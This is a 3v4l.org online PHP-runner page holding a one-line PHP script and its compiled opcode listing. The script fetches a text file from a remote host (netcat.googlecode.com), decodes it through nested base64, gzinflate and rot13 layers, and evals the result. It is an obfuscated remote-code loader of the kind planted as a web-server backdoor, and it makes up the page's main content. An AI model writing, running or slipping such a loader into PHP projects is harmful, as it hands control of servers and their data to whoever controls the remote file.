3v4l.org

run code in 300+ PHP versions simultaneously
<?php $in73ct = "http://netcat.googlecode.com/files/new.txt"; $inj3ct = file_get_contents($in73ct); eval (gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($inj3ct)))))));?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/oScbV
function name:  (null)
number of ops:  25
compiled vars:  !0 = $in73ct, !1 = $inj3ct
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fnetcat.googlecode.com%2Ffiles%2Fnew.txt'
    3     1        INIT_FCALL                                               'file_get_contents'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $3      
          4        ASSIGN                                                   !1, $3
    4     5        INIT_FCALL                                               'gzinflate'
          6        INIT_FCALL                                               'str_rot13'
          7        INIT_FCALL                                               'base64_decode'
          8        INIT_FCALL                                               'str_rot13'
          9        INIT_FCALL                                               'gzinflate'
         10        INIT_FCALL                                               'base64_decode'
         11        SEND_VAR                                                 !1
         12        DO_ICALL                                         $5      
         13        SEND_VAR                                                 $5
         14        DO_ICALL                                         $6      
         15        SEND_VAR                                                 $6
         16        DO_ICALL                                         $7      
         17        SEND_VAR                                                 $7
         18        DO_ICALL                                         $8      
         19        SEND_VAR                                                 $8
         20        DO_ICALL                                         $9      
         21        SEND_VAR                                                 $9
         22        DO_ICALL                                         $10     
         23        INCLUDE_OR_EVAL                                          $10, EVAL
         24      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
153.06 ms | 1395 KiB | 21 Q